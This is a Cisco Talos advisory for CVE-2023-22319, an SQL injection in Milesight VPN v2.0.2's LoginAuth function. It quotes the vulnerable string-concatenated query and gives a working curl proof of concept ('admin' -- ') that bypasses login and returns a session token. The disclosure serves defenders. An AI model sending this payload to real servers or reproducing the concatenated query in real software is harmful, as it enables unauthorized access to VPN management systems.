9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
0.001 Low
EPSS
Percentile
35.9%
CVE-2023-22319
A sql injection vulnerability exists in the requestHandlers.js LoginAuth functionality of Milesight VPN v2.0.2. A specially-crafted network request can lead to authentication bypass. An attacker can send a malicious packet to trigger this vulnerability.
The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.
Milesight VPN v2.0.2
MilesightVPN - <https://www.milesight-iot.com/milesightvpn/>
7.3 - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
CWE-89 - Improper Neutralization of Special Elements used in an SQL Command (βSQL Injectionβ)
The MilesightVPN is software that make the process easier of setting up the VPN tunnel for Milesight products, as well as allows monitoring the connection status with a web server interface.
The MilesightVPN allow to manages the various VPN related configuration and the connected devices through its web interface. The web interface is protected by a login, the responsibility of checking the correctness of the provided credentials is of the requestHandlers.js
βs LoginAuth
function:
function LoginAuth(res,postdata,connection){
console.info('#######log.node:loginauth start');
var sha512=crypto.createHash('sha512');
sha512.update(postdata.pwd);
var pwd=sha512.digest('hex');
$sql="select * from user where user='"+postdata.user+"' and passwd='"+pwd+"'"; [1]
connection.query($sql).then(function(data){ [2]
var result={};
if(data['error'])
{
[...]
}
else
{
if(data['result'].length>0)
{
var dt=data['result'];
result['status']=1;
var token=generateToken(dt[0]['user']);
var exp=new Date(new Date().getTime()+expiretime*1000).toUTCString();
res.setHeader('Set-Cookie',['token='+token]);
console.info('#######log.node:loginauth success');
res.write(JSON.stringify(result));
res.end();
}
else
{
[...]
}
}
});
}
The function compose, at [1]
, the SQL query for checking if the username and password provided correspond to the one of an existing user. Then, at [2]
, the query is executed, if the resulting table is not empty a JWT, corresponding to the matched user, is crafted and placed in the response header as value of Set-Cookie
.
This function is vulnerable to an SQL injection vulnerability, indeed, the composition of the query string is performed through string concatenation instead of a prepare statement. This SQL injection can lead to an authentication bypass.
Following a POC that demonstrates the SQL injection in the login procedure discussed above:
curl -i -k -d "user=admin' -- &pwd=POC" -X POST https://<SERVER_ADDRESS>/LoginAuth
HTTP/1.1 200 OK
Set-Cookie: token=<redacted>
Date: [...]
Connection: keep-alive
Transfer-Encoding: chunked
{"status":1}
The {"status":1}
show that the login procedure found a match for the data provided.
Since the maintainer of this software did not release a patch during the 90 day window specified in our policy, we have now decided to release the information regarding this vulnerability, to make users of the software aware of this problem. See Ciscoβs Coordinated Vulnerability Disclosure Policy for more information: https://tools.cisco.com/security/center/resources/vendor_vulnerability_policy.html
2023-02-14 - Initial Vendor Contact
2023-02-21 - Vendor Disclosure
2023-07-06 - Public Release
Discovered by Francesco Benvenuto of Cisco Talos.
Vulnerability Reports Next Report
TALOS-2023-1700
Previous Report
TALOS-2023-1702